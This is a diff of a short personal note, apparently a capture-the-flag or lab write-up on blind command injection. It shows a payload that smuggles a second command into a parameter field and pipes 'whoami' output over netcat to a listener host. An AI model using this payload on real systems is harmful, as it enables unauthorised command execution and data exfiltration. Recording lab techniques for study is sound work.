sleeptoken/zettelkasten/Remote Thought/Injection.md

 we try injecting code in the txt file we upload but it doesn't execute We then try injecting in the parameter field.

-below is the payload used in the parameter field
+below is the payload used in the parameter field, Because this is blind command injection we can't see the o/p so we grep nc with the payload
 ```sh
 bytebuster ; whoami | nc 10.17.117.61 4444;
 ```